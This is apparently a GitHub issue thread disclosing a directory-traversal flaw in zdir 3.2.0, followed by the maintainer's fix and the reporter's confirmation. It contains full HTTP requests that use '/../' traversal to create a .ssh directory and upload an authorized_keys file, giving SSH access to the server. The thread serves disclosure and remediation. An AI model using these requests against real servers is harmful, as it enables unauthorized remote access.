File upload ssh authorized_keys causes RCE

[yuyan-sec]

The steps to reproduce.

zdir version: 3.2.0

git clone https://github.com/helloxz/zdir

go run main.go init

modify file: /zdir/data/config/config.ini

public_path=data/public

start

go run main.go start

View routes, the interface requires login credentials

Enter the controller.Mkdir method, the parameters submitted by the post request are name and path

Enter the !V_dir method and find that it is only to judge whether the passed path is a folder

This creates a .ssh directory using directory traversal

POST /api/dir/create HTTP/1.1
Host: 127.0.0.1:6080
Content-Length: 28
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96"
X-Token: 433a01baeaa6c37ef46f21621cc06f95
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Accept: application/json, text/plain, */*
X-Cid: bPlNFG
sec-ch-ua-platform: "Linux"
Origin: http://127.0.0.1:6080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:6080/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: USERNAME=admin; CID=bPlNFG; TOKEN=433a01baeaa6c37ef46f21621cc06f95
Connection: close

path=/../../../../&name=.ssh

Enter the controller.Upload method, you can specify the upload path

There is a loophole in the regex to determine whether the path is legal, and you can use /../ to bypass it

Determine whether the folder exists, and terminate execution if it does not exist. So use the above directory traversal to create a folder, and then upload the file name without renaming it.

POST /api/upload HTTP/1.1
Host: 127.0.0.1:6080
Content-Length: 897
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96"
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqjo68lEJ6LlJ8zdA
X-Token: 433a01baeaa6c37ef46f21621cc06f95
X-Cid: bPlNFG
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
sec-ch-ua-platform: "Linux"
Accept: */*
Origin: http://127.0.0.1:6080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:6080/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: USERNAME=admin; CID=bPlNFG; TOKEN=433a01baeaa6c37ef46f21621cc06f95
Connection: close

------WebKitFormBoundaryqjo68lEJ6LlJ8zdA
Content-Disposition: form-data; name="path"

/../../../../../../home/kali/.ssh
------WebKitFormBoundaryqjo68lEJ6LlJ8zdA
Content-Disposition: form-data; name="file"; filename="authorized_keys"
Content-Type: text/plain

ssh-rsa

------WebKitFormBoundaryqjo68lEJ6LlJ8zdA--

Generate an ssh public key for upload

Then you can use ssh to connect to the server

[helloxz]

Thanks for your feedback, I have updated the code in the dev branch to fix this vulnerability and you can verify it again.

This is the change:42c1060

I will merge the code and fix the vulnerability in a subsequent release. Thanks again.

[yuyan-sec]

用 V_fpath 函数绕不过了，因为跳不了目录了。

[helloxz]

好的，感谢您的反馈。这个issue就关闭了。